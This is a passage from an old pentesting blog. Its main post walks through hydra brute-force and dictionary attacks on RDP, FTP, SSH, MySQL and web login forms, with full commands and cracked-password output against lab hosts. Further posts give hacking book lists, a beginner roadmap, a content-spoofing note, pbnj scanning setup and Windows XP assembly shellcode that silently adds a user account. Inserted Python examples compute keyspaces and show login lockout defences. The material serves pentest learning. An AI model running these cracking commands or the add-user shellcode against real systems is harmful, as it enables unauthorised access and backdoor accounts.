Brute force attack & dictionary password cracking using hydra

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Brute force and dictionary password cracking attacks are still effective. A brute force attack becomes more effective when the hacker has good knowledge of password profiling and information gathering. Today I will briefly explain how a hacker can crack passwords using hydra, with either a brute force attack or a dictionary attack. Before that, let me give you a short definition of each.

Brute force attack

A brute force attack tries every combination of characters from a chosen set (a-z, A-Z, digits and other special characters) up to a given length.

Dictionary password attack

A dictionary attack tries each entry of a list of common passwords. For example, you know that "admin" is used as a password to protect various confidential resources, so you put the word "admin" in your dictionary file. You can also download free password lists from various sources (Google search!). If the hacker is lucky, the password will be in the list.

I will explain how a hacker can run a brute force attack with hydra to crack various online accounts.

Brute Force Attack

For a pure brute force attack, the option '-P' is left out and '-x min:max:charset' is used instead, for example '-x 3:3:a' (minimum length 3, maximum length 3, lowercase letters only):

root@find:~/Desktop# hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132

The hydra syntax:
-t = number of parallel attempts at a time (1/5/10/100?). Don't use too many, otherwise you will get false results.
-V = verbose output, show every attempt
-f = stop when the password is found
-l = the username (-L to read usernames from a file)
-P = dictionary file
then the target (IP address or domain name) and the service module, such as http-form-post
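To see what '-x min:max:charset' actually asks hydra to do, here is an added example (my own code, not from the original post and not part of the hydra project) that expands a -x specification the way hydra's man page defines it ('a' lowercase, 'A' uppercase, '1' digits, anything else literal), counts the candidates it generates, and converts that into time at a guess rate. The 50 guesses per second used in the demo is a constructed figure; real rates depend on the service and the -t setting. The point for defenders is the exponential growth: the author's '-x 4:6:a' is already over 321 million guesses, and adding character classes or two more characters pushes it out of reach of online guessing.

```python
import string

# hydra's -x charset letters: 'a' = lowercase, 'A' = uppercase, '1' = digits,
# anything else in the spec is taken as a literal character (hydra man page).
CLASSES = {
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
    "1": string.digits,
}


def expand_charset(spec):
    """Expand a -x charset spec such as 'aA1!' into its distinct characters."""
    seen = []
    for ch in spec:
        for c in CLASSES.get(ch, ch):
            if c not in seen:
                seen.append(c)
    return "".join(seen)


def keyspace(x_option):
    """Number of candidates hydra generates for a 'MIN:MAX:CHARSET' spec.

    '3:3:a' gives 26**3, '4:6:a' gives 26**4 + 26**5 + 26**6, and so on.
    """
    min_len, max_len, charset = x_option.split(":", 2)
    lo, hi = int(min_len), int(max_len)
    if lo < 1 or hi < lo:
        raise ValueError("bad length range in %r" % x_option)
    n = len(expand_charset(charset))
    if n == 0:
        raise ValueError("empty charset in %r" % x_option)
    return sum(n ** length for length in range(lo, hi + 1))


def seconds_to_exhaust(x_option, guesses_per_second):
    """Worst-case time to try every candidate at a given guess rate."""
    return keyspace(x_option) / float(guesses_per_second)


def report(specs, guesses_per_second):
    """Return (spec, candidates, days) rows for a list of -x specs."""
    rows = []
    for spec in specs:
        days = seconds_to_exhaust(spec, guesses_per_second) / 86400
        rows.append((spec, keyspace(spec), days))
    return rows


if __name__ == "__main__":
    # 50 guesses/s is a constructed rate for one target over a LAN; the real
    # rate depends on the service being attacked and on the -t setting.
    for spec, total, days in report(["3:3:a", "4:6:a", "8:8:aA1", "10:10:aA1!"], 50):
        print("%-12s %24d candidates  ~%.1f days" % (spec, total, days))
```

Run it directly to print the table; the functions are also usable on their own, for example to check a password policy against the rate at which a service accepts login attempts.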

Cracking the RDP password

We know the default Windows administrator account is named "administrator", so we only need to brute force the password:

root@find:~/Desktop# hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:24:21
[DATA] 1 task, 1 server, 933 login tries (l:1/p:933), ~933 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Admin" - 1 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Administration" - 2 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "crm" - 3 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CVS" - 4 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS" - 5 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS25" - 6 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS31" - 7 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "INSTALL_admin" - 8 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Log" - 9 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Logs" - 10 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Pages" - 11 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "youradmin" - 12 of 933 [child 0]
[3389][rdp] host: 192.168.67.132 login: administrator password: youradmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:24:46

I did it on VMware Workstation and it was too slow!

Cracking FTP password

The hacker knows the FTP username is 'root', so they run a quick password guessing attack with the following command:

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:45:55
[DATA] 5 tasks, 1 server, 934 login tries (l:1/p:934), ~186 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Admin" - 1 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Administration" - 2 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "crm" - 3 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CVS" - 4 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS" - 5 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS25" - 6 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS31" - 7 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "INSTALL_admin" - 8 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Log" - 9 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Logs" - 10 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Pages" - 11 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "youradmin" - 12 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "ftpadmin" - 13 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlet" - 14 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlets" - 15 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "SiteServer" - 16 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Sources" - 17 of 934 [child 0]
[21][ftp] host: 192.168.67.132 login: root password: ftpadmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:45:55
root@find:~/Desktop#

Here the password is ftpadmin!

root@find:~/Desktop# ftp 192.168.67.132
Connected to 192.168.67.132.
220 Hello, I'm freeFTPd 1.0
Name (192.168.67.132:root): root
331 Password required for root
Password:
230 User root logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection
drwxr-xr-x 1 root root 0 Jan 7 13:39 .
drwxr-xr-x 1 root root 0 Jan 7 13:39 ..
226 Directory send OK

Cracking SSH password with hydra

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt localhost ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:11:56
[DATA] 5 tasks, 1 server, 935 login tries (l:1/p:935), ~187 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "root" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS" - 5 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS25" - 6 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS31" - 7 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "INSTALL_admin" - 8 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "Log" - 9 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "sshfuck" - 10 of 935 [child 0]
[22][ssh] host: 127.0.0.1 login: root password: sshfuck
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:11:58

MySQL password cracking using hydra

In this case we are going to find an empty MySQL password. Some people still do not protect their database server with a password. We can run the attack like this:

root@find:~/Desktop# hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:18:16
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] 4 tasks, 1 server, 937 login tries (l:1/p:937), ~234 tries per task
[DATA] attacking service mysql on port 3306
[ATTEMPT] target localhost - login "root" - pass "root" - 1 of 937 [child 0]
[ATTEMPT] target localhost - login "root" - pass "" - 2 of 937 [child 1]
[ATTEMPT] target localhost - login "root" - pass "Admin" - 3 of 937 [child 2]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 4 of 937 [child 3]
[3306][mysql] host: 127.0.0.1 login: root password:
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:18:16

Note the hydra option -e ns: 'n' adds a try with an empty (null) password and 's' adds a try with the login name itself as the password, which is why "root" and "" are the first two passwords in the output above.

Web Form brute forcing

I coded a simple HTML login form for this test. Hydra can brute force web forms faster and more effectively than other tools, but it requires you to understand how the form is handled, so the hacker needs a basic understanding of HTML too. Also, the hacker (or you) needs to find out the correct username; otherwise the attack fails, or the username has to be brute forced as well, which is a really bad idea.

The login form:

<html>
<head>
<title>Admin Login</title>
</head>

<body>
<center>
<h1>Administrator Login</h1>
<form action="log.php" method="post" >
Username:<input type="text" name="user" placeholder="admin"> <br>
Password:<input type="password" name="password" placeholder="password"><br>
<input type="submit" name="submit" value="submit" >
</form>
</center>

</body>
</html>

What we actually need to brute force is the field with name="password". "password" is the name of the password field, whose value has to match a string from the database or a string hard-coded in the PHP. For better understanding, here is log.php too:

<?php
// Hard-coded password for this test only
$pass = "yourpass";

// Value of the "password" form field, sent by POST
$passGet = $_POST["password"];

if ($passGet == $pass) {
    echo "success!";
    echo "<br>";
} else {
    echo "fail";
}
?>

In the PHP code, $passGet=$_POST["password"]; reads the field value sent by the POST method, and it is compared with the variable $pass. If you enter yourpass in the password field it will say success, otherwise fail.

Imagine we don't know the password, so we are going to brute force it using hydra. We have the following information:

URL: http://localhost/login/ (optional)
Action page: http://localhost/login/log.php (required)
User: admin
Form parameters: user=admin&password=brute-force-here (see the HTML!)

Let us now brute force the password using thc-hydra.

Hydra command 1:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

Here is output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:08:07
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 1]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found
Let's break down "/login/log.php:user=^USER^&password=^PASS^:S=success":

/login/ = path
log.php = action page
user = first parameter
^USER^ = replaced with the strings from -l or -L
password = second parameter
^PASS^ = replaced with the strings from -p or -P (usually a dictionary file, or the -x brute force option)
S=success = when hydra sees the "success" string in the response from the action page it stops: successfully cracked!
This is really important. If the condition is set wrong, hydra will give false positives. So be careful!

Hydra command 2:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

Output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:38:28
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 2]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found

This command brute forces the page using the fail string. When a bad password is entered, the page generates the "fail" message, so we tell thc-hydra to keep attacking as long as it sees the message "fail". Hydra won't stop until it gets a response that does not contain "fail". But we need to be careful: if the success page contains the string "fail" somewhere, hydra will give you false results. It depends on the situation! For example, a success page might have the following welcome message:

Welcome User! We are not responsible if you fail to protect your confidential information. Be careful of hackers!

In this case hydra will give a false result. So think about how you set the fail string!

Some tips against brute force:
1. Use strong passwords.
2. The login page should have a captcha.
3. The server should count failed attempts and block the IP after a few failed logins.
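Tip 3 and the weakness of log.php (a clear-text password compared with ==) are easy to get wrong, so here is an added example in Python of what the server side should look like. It is my own illustration, not code from the original post: the names LoginGuard, verify_password and replay, the thresholds (5 failures in 60 seconds, 300 second lockout) and the PBKDF2 parameters are assumptions chosen for the demo. The password is stored as a salted slow hash and compared in constant time, and a per-IP sliding-window counter locks the source out after a few failures. The constructed wordlist replays the first ten candidates hydra tried in the output above, at the rate a -t 4 run produces: the IP is locked after the fifth failure, so the correct guess "yourpass" at position 10 is refused without even being checked.

```python
import hashlib
import hmac
import os
from collections import defaultdict, deque

ITERATIONS = 100_000  # PBKDF2 work factor; raise it as hardware allows


def make_password_record(password, salt=None):
    """Store a random salt plus a slow salted hash instead of a clear-text string."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(candidate, salt, digest):
    """Hash the candidate the same way and compare in constant time."""
    probe = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, ITERATIONS)
    return hmac.compare_digest(probe, digest)


class LoginGuard:
    """Sliding-window failure counter with a temporary lockout per client IP.

    `threshold` failures inside `window` seconds lock the IP for `lockout`
    seconds; while locked, every attempt is refused without checking the
    password, so even the right guess in a dictionary run is rejected.
    """

    def __init__(self, threshold=5, window=60.0, lockout=300.0):
        self.threshold = threshold
        self.window = window
        self.lockout = lockout
        self._failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self._locked_until = {}              # ip -> time at which the lockout ends

    def _prune(self, ip, now):
        q = self._failures[ip]
        while q and now - q[0] > self.window:
            q.popleft()

    def is_locked(self, ip, now):
        until = self._locked_until.get(ip)
        if until is not None and now < until:
            return True
        self._locked_until.pop(ip, None)
        return False

    def attempt(self, ip, candidate, salt, digest, now):
        """Handle one login attempt; returns 'locked', 'success' or 'fail'."""
        if self.is_locked(ip, now):
            return "locked"
        if verify_password(candidate, salt, digest):
            self._failures.pop(ip, None)
            return "success"
        self._prune(ip, now)
        self._failures[ip].append(now)
        if len(self._failures[ip]) >= self.threshold:
            self._locked_until[ip] = now + self.lockout
            self._failures.pop(ip, None)
        return "fail"


def replay(guard, ip, candidates, salt, digest, start=0.0, interval=0.25):
    """Feed a wordlist from one IP at a fixed rate; returns the outcome per word."""
    return [guard.attempt(ip, word, salt, digest, start + i * interval)
            for i, word in enumerate(candidates)]


# Constructed wordlist: the first ten candidates hydra tried in the output above.
HYDRA_ORDER = ["Admin", "Administration", "crm", "CVS", "CYBERDOCS",
               "CYBERDOCS25", "CYBERDOCS31", "INSTALL_admin", "Log", "yourpass"]

if __name__ == "__main__":
    salt, digest = make_password_record("yourpass")
    guard = LoginGuard()
    results = replay(guard, "192.168.206.1", HYDRA_ORDER, salt, digest)
    for word, result in zip(HYDRA_ORDER, results):
        print("%-15s %s" % (word, result))
```

The lockout is keyed on the client IP, which is what the author's tip asks for; in production you would also count failures per account, since an attacker with many addresses can stay under the per-IP threshold, and you would log every "locked" decision so that a run like the one shown above is visible to whoever watches the server.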

Hope you enjoyed!

Useful books to get into hacking!


A good book can take you far. Having some good books is really a good idea for learning something new and improving our knowledge. I have posted the Amazon links of some useful books (no matter how you get them). These books will really help you get into hacking. After reading them you will have a very good understanding of systems and hacking, and you will be able to find the information you are looking for. There are thousands of free papers, but you don't know what to search for and what to learn. After reading these books you will have a goal, though.

1. C Primer Plus, 5th Edition: To get into hacking and penetration testing we need to understand a programming language. The most powerful language is C. This book is very good for learning the C programming language, whereas "The C Programming Language" is a bit harder for newbies. Get this book and start reading.

2. Core Python Application Programming: For automating quick tasks we must be able to code in a scripting language (for example for exploit development). For this, Python is really very powerful (my favorite language). Learn Python from this book. For the basics of Python get the book "Learn Python the Hard Way" or go to the tutorial section of www.python.org.

3. Assembly Language Step-by-Step: Assembly language is very important for understanding how systems work and for exploit development. This book will teach you basic assembly language using nasm, which is enough to understand registers, instructions and basic coding (such as shellcoding). After reading this book you should read the Intel manuals.

4. Advanced Linux Programming: Don't avoid Linux internals. We are required to know Linux internals, and system programming is the best way in. This book is good and freely downloadable.

5. Get two books on Windows: Windows® Internals, Part 1: Covering Windows Server® 2008 R2 and Windows 7
and
Windows Internals, Part 2: Covering Windows Server® 2008 R2 and Windows 7

and read them when you have free time. Knowing Windows internals is very useful.

6. Basics of Penetration Testing, 2nd edition: I have read the first edition and it was good for newbies coming into hacking. Get a basic idea of penetration testing and hacking from this book.

7. The Web Application Hacker's Handbook, 2nd edition: This is a gold book for learning web hacking. If you are a newbie and read this book carefully, you will have a very good understanding of web hacking. I believe you don't need any other book to learn web hacking. After reading it you just need to start your real research on web hacking. Another book is the OWASP "Web Application Penetration Testing Guide", which is a good start too.

8. The Shellcoder's Handbook, 2nd edition: This book is very good for learning system hacking. It is a bit outdated but still very useful. It discusses common software vulnerabilities like buffer overflows, format strings, shellcoding etc. Get this book!!!

9. Hack using Python: I did not read this book fully, but it is very good if you want to know how to hack using the Python programming language. Yes, you should read this book (get it somehow!).

10. Corelan: Corelan has more than 11 tutorials, which are worth more than other commercial exploit development courses and books. Read them if you want to move into exploit development and shellcoding.

11. Metasploit cookbook

Getting started in pentesting!!!


You also want to get started with pentesting and hacking? Thousands of people want to get started with pentesting and hacking but have no clue where they should start. So I quickly wrote this article so that you can get started easily without any confusion.

NOTE: Hacking is a long road, since it is research. You need to change your mindset completely and be 100% serious that you will start studying to become a hacker or a pentester. If you want to hack for temporary fun or to impress your friends, then being a script kiddie is okay (keyloggers and RATs). It is not possible to learn hacking in a few months; it may take 3-10 years to become a good one. So you choose one option: 1. become a script kiddie, or 2. become a professional pentester, hacker or security researcher. Up to you!!!

Basic

1. Basics of networking: Understanding networking is really important, since everything we do goes over the network. So you should have a good understanding of TCP/IP and the OSI model.

2. Programming: Programming is very important for being a hacker or pentester, because we must know how a program and a system really work. Also, without programming skills it is hard to find a vulnerability. The most important languages you should learn are:

                Python
                C/C++
                Assembly
                PHP

Intermediate
1. Become a system administrator: Yes, you need to be a system administrator of both Linux and Windows. If you can't be a good system administrator, it is not possible to be a good pentester.
2. Writing code: Write basic code. You don't need to be a software developer, but programming is the best weapon for solving your problems. For example, you want to complete a task automatically (such as deleting a file), check the permissions of hundreds of files, etc. So write code!!! Maybe 10-50 lines of code can do very powerful work for you.
3. Read some online articles and resources:
4. Try to go deeper into the operating system: Yes, understand the internals of the OS (Windows, Linux). If you want to be a hacker, you need to know the operating system very well.

Intermediate+
1. Virtualization: Get VMware Workstation or VirtualBox. Install various operating systems such as Windows XP, 7, Red Hat, Debian etc. Install some additional software and run your port scanner, vulnerability scanner etc.

2. Old applications and known vulnerabilities: Go to exploit-db.com and get some vulnerable applications. Install them on your VM and re-create the exploit, using your debugger and your knowledge. You should install various software, including web and system software. You may also get the OWASP "Broken Web Applications" VM.

3. Pentesting distro: Install Kali (BackTrack) Linux and use the tools against your VM.

4. Hack: Hack yourself and hack the VM before going into the real world.

Advanced
You will understand when you need advanced knowledge and what "advanced" means.

There are lots of things you need to become a successful hacker. Everything can take 1, 2, 3 or even more years. You need to be patient and serious about hacking. It is not possible to learn to hack within a few days. Just keep going until you succeed, and success will be waiting for you :). Various books on pentesting are really very helpful. I will write another post with reviews of some books to learn hacking more quickly.

Content spoofing attack (Brother of Reflected XSS)!


Content spoofing is altering the data or text of a web page. XSS uses <script> or other JavaScript (e.g. <script>alert(1)</script>), whereas content spoofing does not: it can be done with plain text or HTML code. A hacker can deface the page virtually, but is not able to own the server or the site.

Since there are two good explanations of this vulnerability, you had better read them there:

https://www.owasp.org/index.php/Content_Spoofing
http://projects.webappsec.org/w/page/13246917/Content%20Spoofing

Something like this:
https://www.owasp.org/index.php/Pusheax.com_is_a_independent_penetration_tester,_ethical_hacker_who_always_love_to_learn_new_things_and_share_knowledge.Knowledge_should_be_free_but_not_the_hard_work._There_is_nothing_perfect.

http://projects.webappsec.org/w/page/13246917/%28pusheax%20is%20a%20regular%20independent%20pentester%20,%20I%20love%20to%20learn%20new%20things,and??

It is not powerful enough to hack an entire server or website, but sometimes this kind of vulnerability is enough to fool the users.

My first shellcode was in two registers, The adduser shellcode!


I always tried to learn to write simple shellcode in assembly language. But writing shellcode was not my first interest; my interest was exploit writing. I had to learn assembly language for various reasons, such as understanding how the computer works, using a debugger effectively, exploit writing, fun etc. So I searched Google a lot for "writing shellcode" and fortunately found some amazing tutorials (see the references!). I will explain each line of my first shellcode below. Before that, here are the tools I used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c

The shellcode:

;add user shellcode. Only will work on windows xp3. Written by pusheax.com 
[BITS 32]

global _start

section .text

_start:
jmp short command


function: ;Label
;WinExec("Command to execute",NULL)
pop ecx
xor eax,eax
push eax
push ecx
mov eax,0x7c8623ad
call eax

xor eax,eax
push eax
mov eax,0x7c81cafa
call eax



command: ;Label
call function
db "cmd.exe /c net user pusheax popebp /ADD"
db 0x00


So let me explain each line:

[BITS 32] : tells nasm that the code is 32-bit.

global _start : declares the main starting label.

section .text : declares the code section.

jmp short command : the jmp instruction jumps to another label, called "command". A "call" instruction is not usable here because "call" saves the address of the next instruction on the stack in order to return to it. This is a really common trick when writing shellcode: jump to the "command" label and leave no return address on the stack.

So now we are at the label "command", which holds the following instructions:

call function : calls the "function" label and saves the address of the next "instruction" on the stack for the return. That next "instruction" is simply the system command string:

 db "cmd.exe /c net user pusheax popebp /ADD"

So now we are in the label "function".
There is a simple Windows API we need to call, WinExec(), http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx . It only requires two parameters.

pop ecx : takes the return address from the top of the stack into ecx and removes it from the stack.

xor eax,eax : clears the eax register to 0. We could push 0 onto the stack directly, but that would clearly produce null bytes, so most shellcoders use xor.

push eax : pushes 0 onto the stack. Since the stack is LIFO, this is the last parameter.

push ecx : remember that we popped an address into ecx? ecx is actually pointing at "cmd.exe /c net user pusheax popebp /ADD". So we push this string onto the stack as the first parameter of WinExec(). The stack now holds the arguments of WinExec("cmd.exe /c net user pusheax popebp /ADD", NULL).

mov eax,0x7c8623ad : 0x7c8623ad is the address of WinExec(). Move this address into eax. I found this address using arwin.exe (./arwin.exe Kernel32.dll WinExec).

call eax : eax = WinExec(), so this executes the API function.

xor eax,eax : clears the eax register, because we are going to terminate the current process soon. We call ExitProcess() to exit the current process; otherwise the shellcode may get corrupted. You can see it in a debugger.

push eax : as above, pushes the last parameter (0) onto the stack.

mov eax,0x7c81cafa : as above, I used arwin to find the address of the ExitProcess() function.

call eax : eax = address of ExitProcess(). Calling eax executes the function.

Test

1. nasm -f bin -o shellcode.bin <your .asm file>
2. ./xxd-shellcode.sh shellcode.bin
3. Paste the output into shellcode-test.c.
4. Compile with MinGW and execute, then check for the new user name :).

References:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20

Port scanning using pbnj!


Recently I installed Kali Linux on VMware Workstation. There is a tool called pbnj which can scan ports and store the results in a MySQL database. Sometimes it is useful to store vulnerability assessment results in a database, but in Kali Linux pbnj is not installed by default. pbnj uses nmap (with "-a [options]") to scan the network; I only use it to store the results in a database!

Let's see how to install it and use it to scan ports and store the results in the database:

root@find:~# apt-cache search pbnj
pbnj - a suite of tools to monitor changes on a network
root@find:~# apt-get install pbnj

Start the MySQL service on Kali Linux:

root@find:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..


Let's find all files related to pbnj:

root@find:~# updatedb;locate pbnj
/usr/bin/outputpbnj
/usr/bin/scanpbnj
/usr/share/doc/pbnj
/usr/share/doc/pbnj/BUGS
/usr/share/doc/pbnj/EXAMPLES
/usr/share/doc/pbnj/NOTES-ON-NMAP-VERSION
/usr/share/doc/pbnj/README.gz
/usr/share/doc/pbnj/changelog.Debian.gz
/usr/share/doc/pbnj/changelog.gz
/usr/share/doc/pbnj/copyright
/usr/share/doc/pbnj/examples
/usr/share/doc/pbnj/examples/csv.yaml
/usr/share/doc/pbnj/examples/mysql.yaml
/usr/share/doc/pbnj/examples/pg.yaml
/usr/share/doc/pbnj/examples/sqlite3.yaml
/usr/share/man/man1/outputpbnj.1p.gz
/usr/share/man/man1/scanpbnj.1p.gz
/var/cache/apt/archives/pbnj_2.04-4_all.deb
/var/lib/dpkg/info/pbnj.list
/var/lib/dpkg/info/pbnj.md5sums



I am going to use MySQL, so I am only interested in "/usr/share/doc/pbnj/examples/mysql.yaml". We need to edit this file to use the correct username, password and database:
root@find:~# cp /usr/share/doc/pbnj/examples/mysql.yaml ~/.pbnj-2.0/config.yaml
root@find:~# nano ~/.pbnj-2.0/config.yaml
# YAML:1.0
# Config for connecting to a DBI database
# SQLite, mysql etc
db: mysql
# for SQLite the name of the file. For mysql the name of the database
database: pbnjdb
# Username for the database. For SQLite no username is needed.
user: root
# Password for the database. For SQLite no password is needed.
passwd: ""
